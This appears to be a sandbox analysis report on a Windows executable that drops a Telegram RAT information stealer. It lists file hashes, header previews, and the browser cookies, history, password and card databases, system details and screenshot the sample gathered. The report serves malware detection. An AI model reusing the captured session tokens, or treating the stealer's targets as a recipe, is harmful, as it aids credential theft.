Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I.l...?...?...?..k?...?_..>...?_..>...?_..>...?_..>...?...>...?...?\|..?...>...?...>...?...?...?...>...?Rich...?................PE..d.....a.........." .....b...........a....................................................`.............................................. ...=.......................^..............p...T..............................8............................................text....`.......b.................. ..`.rdata..D............f..............@..@.data....6...P...,...2..............@....pdata...............^..............@..@.rsrc................H..............@..@.reloc...............R..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\tcl86t.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1866480
Entropy (8bit):	6.5127394823224245
Encrypted:	false
SSDEEP:	24576:aNJSAyrJZwdI3xpXxBX4Crw9yilqy+uVUD5Wbsr+Qt682zhPlkPkGqTvI92jHBH9:aNgjid2LD5W4ac6xdLvIkhHP4ATdeD0
MD5:	75909678C6A79CA2CA780A1CEB00232E
SHA1:	39DDBEB1C288335ABE910A5011D7034345425F7D
SHA-256:	FBFD065F861EC0A90DD513BC209C56BBC23C54D2839964A0EC2DF95848AF7860
SHA-512:	91689413826D3B2E13FC7F579A71B676547BC4C06D2BB100B4168DEF12AB09B65359D1612B31A15D21CB55147BBAB4934E6711351A0440C1533FB94FE53313BF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"Tw^C:$^C:$^C:$.6;%\C:$8,.$]C:$.6?%RC:$.6>%VC:$.69%ZC:$W;.$LC:$.+<%_C:$.+;%SC:$^C;$GB:$.62%.C:$.6:%_C:$.6.$_C:$.68%_C:$Rich^C:$........PE..d...@..a.........." .....................................................................`.........................................@....`...+..T.......8............^..............P...............................p...8............................................text...H........................... ..`.rdata..............................@..@.data....#...P.......<..............@....pdata...............D..............@..@.rsrc...8............<..............@..@.reloc...............@..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	9737728
Entropy (8bit):	5.889520608360159
Encrypted:	false
SSDEEP:	98304:rRipp0rNB8XL8xDz6HFh6DG+0EV9II93tDDGA+c99tciWhdzCcDqHB26LDA:8gG1EV9II9MqM6A
MD5:	BA25C8AF9DD114244EC83C9F6B0D12EB
SHA1:	49429C4B5448014664CBD3404174EC87A662D324
SHA-256:	0CE54664ECF691C84263A6FD18741365104CDEEA3F21E5086CBE55F6BEDCC41B
SHA-512:	E64D9065E0EA05F32080499C67C75D4DF01C286906FFF42C3BB720E4EC2B305C32585F61884B5FDF147BD43E948EC0D4B63134B3946715E88B1B73A2E8B278AF
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....M.d........../....#......................@......................................w...........................................................4........u......X..........................................@...(.......................(............................text...............................`.P`.data...`.... ......................@.`..rdata..P...........................@.`@.eh_fram............................@.0..pdata...X.......Z..................@.0@.xdata...o...P...p..................@.0@.bss..................................`..idata...4.......6..................@.@..CRT....h...........................@.@..tls................................@.@..rsrc.....u.......u.................@..@........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\tk86t.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1541872
Entropy (8bit):	6.176467305040153
Encrypted:	false
SSDEEP:	24576:C1Bvnu8AyQD9FLi543GLUKuPO6EinYTVAiueFoC+vMvE58KOJ0wd98ydeyRP/ecr:CIyQD9FU43GLUKuPO6EinYTVAFSvESKI
MD5:	4B6270A72579B38C1CC83F240FB08360
SHA1:	1A161A014F57FE8AA2FADAAB7BC4F9FAAAC368DE
SHA-256:	CD2F60075064DFC2E65C88B239A970CB4BD07CB3EEC7CC26FB1BF978D4356B08
SHA-512:	0C81434D8C205892BBA8A4C93FF8FC011FB8CFB72CFEC172CF69093651B86FD9837050BD0636315840290B28AF83E557F2205A03E5C344239356874FCE0C72B9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h3.,,R..,R..,R..~'.~.R..~'.~'R..~'.~$R..~'.~(R..w:.~/R...'.~-R..%*'.<R..w:.~9R..,R..eS...'.~.R...'.~-R...'K.-R...'.~-R..Rich,R..........................PE..d...m..a.........." .........~......\|.....................................................`.............................................L@...[..\|........{... .......j.......`...A...-...............................-..8...............8............................text...X........................... ..`.rdata...l.......n..................@..@.data................j..............@....pdata....... ......................@..@.rsrc....{.......\|..................@..@.reloc...A...`...B...(..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1122192
Entropy (8bit):	5.375103168153638
Encrypted:	false
SSDEEP:	12288:TezMmuZ63N9QCb5Pfhnzr0ql8L8kkM7IRG5eeme6VZyrIBHdQLhfFE+uoo43:TezuuZV0m88MMREtV6Vo4uYoos
MD5:	814D6938DA8E46D79B64326AA967A1A0
SHA1:	6D020C9CA51D7D4E77C197F5394D7E157482CEA3
SHA-256:	4059ACB95B05B4536C983EBD232DC5AEC00828914E61F31674B0FDF41656DEB6
SHA-512:	F286B6E813BCD3EE9AAD25F804689E3E8BBE13A41BB5715E49BCC1DC7CCAE2F0C7595DBAABAD806FEA65825952E5E31D32AC9B31E583BF4B7CDF716AE6FA08D1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.$~6OJ-6OJ-6OJ-?7.-0OJ-d:K,4OJ-d:O,:OJ-d:N,>OJ-d:I,5OJ-.:K,5OJ-.=K,4OJ-6OK-\|OJ-.:G,7OJ-.:J,7OJ-.:.-7OJ-.:H,7OJ-Rich6OJ-................PE..d.....a.........." .....J..........T).......................................@.......]....`.............................................X...h........ .......................0......`L..T............................L..8............`...............................text....I.......J.................. ..`.rdata.."....`.......N..............@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	97168
Entropy (8bit):	6.424686954579329
Encrypted:	false
SSDEEP:	1536:yKHLG4SsAzAvadZw+1Hcx8uIYNUzU6Ha4aecbK/zJZ0/b:yKrfZ+jPYNz6Ha4aecbK/FZK
MD5:	A87575E7CF8967E481241F13940EE4F7
SHA1:	879098B8A353A39E16C79E6479195D43CE98629E
SHA-256:	DED5ADAA94341E6C62AEA03845762591666381DCA30EB7C17261DD154121B83E
SHA-512:	E112F267AE4C9A592D0DD2A19B50187EB13E25F23DED74C2E6CCDE458BCDAEE99F4E3E0A00BAF0E3362167AE7B7FE4F96ECBCD265CC584C1C3A4D1AC316E92F0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...Y.-a.........." .........`......p.....................................................`A.........................................B..4....J...............p..X....X...#..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\user-st.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	655770
Entropy (8bit):	7.997269575710416
Encrypted:	true
SSDEEP:	12288:JveO8gGRqq2zIUdda6n120e4xUC6kLJMj9n6Ddy0hqN+POWz35SyzjHG:Jve1Rq6UddD1ulkLJBzhqNaOWz35/zLG
MD5:	F6C91DDB31B2871E985AD7F3F850552E
SHA1:	1B5FC8DE860353D978B1705779C29715691A714E
SHA-256:	6B68064A0B68E35686302443821A291914AF9EAE7ED9EE0035BFEE7010D7F230
SHA-512:	8452BA8EB287950E21C2D8FDB09E22B0DDA23DB779DED7AFBDEBAE5D3F5CD7A351704FE8994C7EDDC85D5A9006AF1BC02D7E22E3B97E6011727E40D535445494
Malicious:	false
Reputation:	unknown
Preview:	PK.........m!W................Browsers/PK.........m!W................Programs/PK.........m!W................System/PK.........m!W................Browsers/Chrome/PK.........m!W............#...Browsers/Chrome/Default Cookies.txt..M..H.........`.PT.....A.E.k.!\|............LR...:.sRO.vU.;f..:1.jM..N,.2.(H@."B..CR(..............V..I.J`......GEq..1h+.'.o..2..Q.g...Lg.......W.j...X.\|N.].....FwK%(.....j...t..Z4$..!.P{...1....(A.Q.R,a4....d.!A.x.N..Hp......{...?lSR.g...i.....T$u.Ty..8..1...t.g). !.b(?O.C...Db..b.a.......&<.. }...a..Sr......` ...bA.R(.y.....S$.Xx.K..../.........."..H.......S...-..If...G....J..,..x,.<..9.O....P.B...P. ;..g.Tpr.@..@.....;..9.7..H.....I.,.8]Q.,}. ...R...T2...:\|zG?6.......QGQ......I.g[=............\|.x....l.>..N6_[7..,...K.Sc88..D...Yq.....\.Zo..J;r.....),..Go..v...Q......9.1.-(.p...<..x~.D..Dim^.v._...R.L......p..p?.D..%gi.W..g.yYrz.........C....mS...!...........c...u....8T.}...GY..,.?..1.z..j.C...b][....A.x...Oa.

C:\Users\user\AppData\stink\Browsers\Chrome\Default Cookies.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1508
Entropy (8bit):	5.8635951059191544
Encrypted:	false
SSDEEP:	24:/3IojsQQI/cw7vbTcw75cUSNdJkFlhno8vdY42FLGkPIkxkv:/PsLI/cw7vbTcw75cUS1kLhnosiHpIwo
MD5:	A721EC782B6FC574A795210225E03DAA
SHA1:	85AEBDB62DB8E859579A4D4A4728A1A8F147D5AD
SHA-256:	A26B76F13BE5DEA2D90006C636D9039190E4D11C6BA82F64F81F7ADC2E9CD1EC
SHA-512:	2AE6752CFA2E6E4C546DB1F244F0CCC225CB33213D236309DF8EB6433148A90B14814E6DE5F9C15C6FD49C6E5BBD35300E84480111E92EC252701A6E2B1B6648
Malicious:	false
Reputation:	unknown
Preview:	.google.com.TRUE./.FALSE.2538097566.AEC.Ad49MVEVy5CxtQLtYrblzXz4DifLm5q80KxkAsZM0tGClBBQswyzDRIjhA...google.com.TRUE./.FALSE.2538097566.CONSENT.PENDING+494..www.google.com.TRUE./.FALSE.2538097566.DV.Uw-QAWGHFCMcQIF0XFQkBViNIwrwnRg...google.com.TRUE./.FALSE.2538097566.GOOGLE_ABUSE_EXEMPTION.ID=743584646b6d7876:TM=1691663507:C=r:IP=84.17.52.38-:S=tthyMI8Cvn5vO7C4FE_Vh3U...microsoft.com.TRUE./.FALSE.2538097566.MC1.GUID=762ed1c63ceb49b49cb46dba465abf5d&HASH=762e&LV=202308&V=4&LU=1691663513605...microsoft.com.TRUE./.FALSE.2538097566.MS0.422da71b383d453fad5f9d7c2bd69b73..dotnet.microsoft.com.TRUE./.FALSE.2538097566.MSFPC.GUID=762ed1c63ceb49b49cb46dba465abf5d&HASH=762e&LV=202308&V=4&LU=1691663513605..dotnet.microsoft.com.TRUE./.FALSE.2538097566.MicrosoftApplicationsTelemetryDeviceId.82a40d28-864b-41fe-a279-21bff0443578...google.com.TRUE./.FALSE.2538097566.SOCS.CAESHAgCEhJnd3NfMjAyMzA4MDMtMF9SQzIaAmVuIAEaBgiA0dCmBg..www.google.com.TRUE./.FALSE.2538097566._GRECAPTCHA.09AP5ubKd8Hj-yqzWSlTbHObp7d

C:\Users\user\AppData\stink\Browsers\Chrome\Default Extensions.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	33
Entropy (8bit):	3.3835263827774313
Encrypted:	false
SSDEEP:	3:OH36ovZa1e2Rn:k36yg7n
MD5:	6B16602200BF2291D4ABD826BF4690F7
SHA1:	D486BF073F6D6B6D5934AB25A38BBC65D70C5B67
SHA-256:	062A6293B91661E186F89EFAB7EB86FF35BDA5025E1C09A2E7281DFE49396AC6
SHA-512:	61E325AA21787CFBB375B522355ACC4C3519CB01C7BAE8506A2FFFEA29FFF9BAA83A16811E6FA42F2CFB4836DA3E7ABF900093F9B2BDB92B081EF9962238669F
Malicious:	false
Reputation:	unknown
Preview:	__MSG_extName__..__MSG_APP_NAME__

C:\Users\user\AppData\stink\Browsers\Chrome\Default History.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
File Type:	ASCII text, with very long lines (323), with CRLF line terminators
Category:	dropped
Size (bytes):	1404
Entropy (8bit):	5.683388173204022
Encrypted:	false
SSDEEP:	24:MEjBD78TSejBDDO8LHuyLJJLtO7Tv/O7TBrCoSQQQ1/tRYiejO7TziG:TWT7dpLHtjc7TvW7TBrC3L6tFN7TOG
MD5:	620F4B3060FD4AE3D337F89C2EFBCA45
SHA1:	588D54558A1BBA9FBAD05A79659D6E7A726C5078
SHA-256:	AA51825F82CAFC1B29ABC5281C90CDE5890244411A425ED1BEBE6804C5356478
SHA-512:	2DC27EC91E6D849F003D7F21B40D3B42CC3FE8F542AC66600789E7AEC4071CF756C58FA969AB3565D7DB5F9A6A37A1D2017A67A1399655707DFA9501801512E3
Malicious:	false
Reputation:	unknown
Preview:	URL: https://dotnet.microsoft.com/en-us/download/dotnet-framework/net48..Title: Download .NET Framework 4.8 \| Free official downloads..Last Visit: 2023-08-10 10:31:12.960438....URL: https://dotnet.microsoft.com/en-us/download/dotnet-framework/thank-you/net48-web-installer..Title: Download .NET Framework 4.8 Web Installer..Last Visit: 2023-08-10 10:31:16.412346....URL: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3D.net%2B4.8%26oq%3D.net%2B4.8%26aqs%3Dchrome..69i57j0i512l9.1155j0j7%26sourceid%3Dchrome%26ie%3DUTF-8&q=EgRUETQmGIr50qYGIjDTg53RKJ5CzVGoPdPY4cUngt6OOoh1r4tqu7T5Hurime7T8opnINVeXdepF05VSCwyAXJaAUM..Title: https://www.google.com/search?q=.net+4.8&oq=.net+4.8&aqs=chrome..69i57j0i512l9.1155j0j7&sourceid=chrome&ie=UTF-8..Last Visit: 2023-08-10 10:31:00.640272....URL: https://www.google.com/search?q=.net+4.8&oq=.net+4.8&aqs=chrome..69i57j0i512l9.1155j0j7&sourceid=chrome&ie=UTF-8&google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D743584646b6d7876:TM%3D1691663

C:\Users\user\AppData\stink\Chrome Default Bookmarks

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	947
Entropy (8bit):	4.222370991811923
Encrypted:	false
SSDEEP:	12:1HJaqKETNxLw26McyyJfKEL3LoHcdoyJBKE1Yq3LSO3oyZL1:1HcGrw2vc9SwoHcNQr8SOT1
MD5:	25749F99B5245CFF507A7C436CB372A5
SHA1:	6D27E88CA32ACBAFE3273F9C43C99B1DAE2093DF
SHA-256:	7379CC79CDDDF15A2F7CC38AACF3359BD061A633ACF181FA46FC47BE9DD8B70E
SHA-512:	E6147991E4ABA38A7854AB5B1BDD202216F4523AFE853DF8720C3011B96C007954F3D2F21C2017D90758288C2704981B8C94C9DA0848CD0B445C6A39A5D528A5
Malicious:	false
Reputation:	unknown
Preview:	{.. "checksum": "1e54fbb25d92a354f7aeaf576726429e",.. "roots": {.. "bookmark_bar": {.. "children": [ ],.. "date_added": "13245924509383108",.. "date_modified": "13245924589059141",.. "guid": "00000000-0000-4000-a000-000000000002",.. "id": "1",.. "name": "Bookmarks bar",.. "type": "folder".. },.. "other": {.. "children": [ ],.. "date_added": "13245924509383117",.. "date_modified": "0",.. "guid": "00000000-0000-4000-a000-000000000003",.. "id": "2",.. "name": "Other bookmarks",.. "type": "folder".. },.. "synced": {.. "children": [ ],.. "date_added": "13245924509383122",.. "date_modified": "0",.. "guid": "00000000-0000-4000-a000-000000000004",.. "id": "3",.. "name": "Mobile bookmarks",.. "type": "folder".. }.. },.. "version": 1..}..

C:\Users\user\AppData\stink\Chrome Default Cards.db

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2861458126645597
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJxz6zVucbj8Ewn7PrH944:gS/inRQVucbj8Ewn7b944
MD5:	13A67FCABA59E4D6CE4CBC1DA50B72A8
SHA1:	3974D2F90220322108483CEF19601AA09972C3F5
SHA-256:	7BD3F40AE06D965E1C4E98D8EF2EEB00A18DD93F934ADF9F16BC682B63CD8927
SHA-512:	A07327C16463A7DF4C76DC2A682E949CF898BBC2211EFA7E4F917E13DE4BB1C0C98923B8827E191BBBC2D42FF976748D3C6C86A8A5080008BD95ABC69DDD374F
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\stink\Chrome Default Cookies.db

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 11, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	1.525382148408982
Encrypted:	false
SSDEEP:	96:oe8To9Eapxv//u29ikqnXxa3Itq273BzkTDnw3:o3IpV//u2QZo27V
MD5:	BAD7730F6FDE1661858D7C76366933B1
SHA1:	7679157DBA24CF0FD2DC03AE73611B04227EF8A5
SHA-256:	9F5A853FAB80EF233F4382B3B07412D1077AF8985222BBF701C8A824BEE22AFB
SHA-512:	B1B1E0C534D96138F8752936776C3A7FD08100C99B04C55A0D7F22D0688868829C784C34F319A9FBC8F18F54DEFC7E7B07C9E40734C7C48882FE0BDEC3C66E5E
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\stink\Chrome Default History.db

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 5, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	0.7571971047177339
Encrypted:	false
SSDEEP:	384:b7T18G7Tct7TMypHDiEwABBE3us7T18xG7T1kM:b/18G/ct/JiEZBBjs/18xG/1kM
MD5:	52E68AF64F9581F138FD83031D06DFEA
SHA1:	015F6B2B9715533E799C271AFD99F54CCD4D2921
SHA-256:	80F130BC6008ED00AD51D9E43C117CBFC386626AF8954C0CB03D756BDA8B74EE
SHA-512:	D2744EC27FC9237B043F000EDE964D4D3E66056BDF7B30792FAD74350568B477E2DD872C385AEED5D90A3A7A7EDC7EA0E2036CCEF8E9C3FC1A051E05100B5293
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\stink\Chrome Default Passwords.db

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\stink\System\Configuration.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	612
Entropy (8bit):	4.364659243404922
Encrypted:	false
SSDEEP:	12:fhS9jpAI+C9/XQWYk+bwWRQA1dIVgAnPId:a9r1hXKk+/REVDwd
MD5:	A2A110A4E9BD64782828BD5853B1C842
SHA1:	989A7AD954A0342DAE910C9E97B3128F97CD37EF
SHA-256:	54F193223CCCF74E91A1B3675A7563D93BE1557474E00540CAA052E8DDAF8211
SHA-512:	4113B611DEA1651A229CACCD2D7FF45234AC3F2A899A7B1DA8C6B1491DDAE1CA9047EFA8EA4045EF59163CD29C91005D1FDA3C4D4B0A0E86A3E0F896D9D659F3
Malicious:	false
Reputation:	unknown
Preview:	User: user..IP: 84.17.52.42..Machine Type: AMD64..OS Name: Windows-10-10.0.17134..Machine Name on Network: 494126..Monitor: 1280x1024..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: Microsoft Basic Display Adapter..RAM:..+---------+---------+----------+..\| Used GB \| Free GB \| Total GB \|..+---------+---------+----------+..\| 5.39 \| 2.61 \| 8.0 \|..+---------+---------+----------+..Drives:..+-------+---------+---------+----------+..\| Drive \| Used GB \| Free GB \| Total GB \|..+-------+---------+---------+----------+..\| C:\ \| 143.5 \| 80.0 \| 223.5 \|..+-------+---------+---------+----------+

C:\Users\user\AppData\stink\System\Processes.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	18308
Entropy (8bit):	3.3396629620981777
Encrypted:	false
SSDEEP:	384:G58jPw8GIEpzk0PzoK6TuODQphRHwuHjsoboeNX8Ow+mbz/Q6b1B5Eo170p1rgLo:G58rw8GIEpzk0PzoK6TuODQphRHwuHjD
MD5:	A190CA70F6D1328F6358BEC3AD91F46E
SHA1:	CBD1E95CE0A24E189916114727C31611F95A526F
SHA-256:	25B0D5992F1898EA5924AA539B3D798BBAF6748C80EB2819E7159276CDD9B9E3
SHA-512:	32F8D4453926299BAF7D32B22568A5F061489249DD5EE0FD3A63046CB101E026D94F5BC5CEC30A622F1887C4CD36A3E21BACCA653B258E7A1719B94D050B1A86
Malicious:	false
Reputation:	unknown
Preview:	+--------------------------------+--------+------+.\| Name \| Memory \| PID \|.+--------------------------------+--------+------+.\| System \| 0 MB \| 4 \|.+--------------------------------+--------+------+.\| Registry \| 0 MB \| 88 \|.+--------------------------------+--------+------+.\| smss.exe \| 0 MB \| 304 \|.+--------------------------------+--------+------+.\| csrss.exe \| 0 MB \| 400 \|.+--------------------------------+--------+------+.\| wininit.exe \| 0 MB \| 476 \|.+--------------------------------+--------+------+.\| csrss.exe \| 0 MB \| 484 \|.+--------------------------------+--------+------+.\| services.exe \| 0 MB \| 568 \|.+--------------------------------+--------+------+.\| winlogon.exe \| 0 MB \| 576 \|.+--------------------------------+--------+------+.\| lsass.exe

C:\Users\user\AppData\stink\System\monitor-1.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	654816
Entropy (8bit):	7.9465808747481335
Encrypted:	false
SSDEEP:	12288:fa3ILWP9nd4qq2zIMddu61120es3b6QYOQHf4IDYhJdyO4jABD1Phu/:faYu9nd4q6MddfzlLnw4IsdSABzE
MD5:	989CD68C8B7D8A5F1B04CB8116D50055
SHA1:	8A2BC76047E730DEFD4102135A3CF82FD02F796C
SHA-256:	3919F490CDFFA51898F590CBE528712F77747354F866898881FB8184D0CFABB4
SHA-512:	3B3E04BA0BF6E9DB22B8F7C7871F9ECE8F8B14B9D34F2D6A5BE4A4C98B282B464AC46EDCD1B5400FBA415547FA593E6182E1898215DFBD18190D98EF2C2675DE
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............1.c.....IDATx......E.?...........K0+.(. ...=..{w...=}..0.T..D..d....`:.w.s.\@D.%.........U.fzf...3......t.oWuU..T..aZuI.u.I..f.dnR.O.I....U0%=qRm....Sj..4~JOw.....`.`V.n.V..L....%Ur...S`Z..IQ.T+'-..+......[.......k.U7Y.Nr#.R>..I..V..'.R...rr...[uK..I..J.zk'p...8.4..f`Z..i.r\|.~....86.y.9.O.\|..&..."..z/....}.L8_..F...dZv.......S......8..q...>R.......}..{..{..J.8...L..6.@.s......g..'.....8.~ZQ.m..D..w..R6.....}_.. .0I..8..S.A..`C..n.l..~......p..'t.3..T7i.#..d[..$...'.U0%=.......k.}.t.IT.~...Y...g.....n.I.4"/...Q.+h..x...........C...`...0....p.......p..7........8z.#.....g...^.....`.`.`................1.B8....<.0...U.L........U..c`.,e.......+..]}.._e..;C...J..;..".../9.0...A.;...p.HZ....\>......Y.pT.P9.=....=...b...!..H./m...3>.............oa.....'...d..M..I...`....Z....c.i<_A....u..X.n-[.."..7)..Zr...u...7...p....\|.{.8.=..5M..`...........b..!.[.n...pQ...]...R.......&Ns.....z<.3..:.{.0.t...S7+.......]..v.,.

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.995235259278073
TrID:	Win64 Executable (generic) (12005/4) 74.80% Generic Win/DOS Executable (2004/3) 12.49% DOS Executable Generic (2002/1) 12.47% VXD Driver (31/22) 0.19% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	file.exe
File size:	9'189'187 bytes
MD5:	42ba63deb6c8bfdd80b696e533ee9f2a
SHA1:	08b4a60367f8b4220a0d0116f57a7fcfce6ed402
SHA256:	21137e9491dedb0adf2088857f7cff726c5864c9c263d1e50740355ab62e3fdf
SHA512:	bf1182718f82bd34ca67ef018391ac52c09007aaf62a67c0037eb562817f206aa2e8d615055d2383cf0cc969a3610778c6aa3de254cafb9658a6748a33819c9f
SSDEEP:	196608:IlIiOZKy0E68nFXXM7Nw77TWn8yj8UXnLAjJ88XYDwmKFpjujEptJBtKkvde+:2I50E68ZXMJw7PWn8TUMjG8XYD784itX
TLSH:	5C96331DE6F094DEC247DAF2E2AA1C75B830F8260150D4B69624A7F16F61FE0DB9C391
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....M.d........../....#.V....................@..............................0................ ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4010ed
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp:	0x64F14D10 [Fri Sep 1 02:31:44 2023 UTC]
TLS Callbacks:	0x41ece0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	9ea5854395f99dfb3b55a7e476af7f9c

Entrypoint Preview

Instruction
push ebp
dec eax
mov ebp, esp
dec eax
sub esp, 30h
mov dword ptr [ebp-04h], 000000FFh
dec eax
mov eax, dword ptr [00029EADh]
mov dword ptr [eax], 00000001h
call 00007FFA3C530062h
mov dword ptr [ebp-04h], eax
nop
nop
mov eax, dword ptr [ebp-04h]
dec eax
add esp, 30h
pop ebp
ret
push ebp
dec eax
mov ebp, esp
dec eax
sub esp, 30h
mov dword ptr [ebp-04h], 000000FFh
dec eax
mov eax, dword ptr [00029E7Eh]
mov dword ptr [eax], 00000000h
call 00007FFA3C530033h
mov dword ptr [ebp-04h], eax
nop
nop
mov eax, dword ptr [ebp-04h]
dec eax
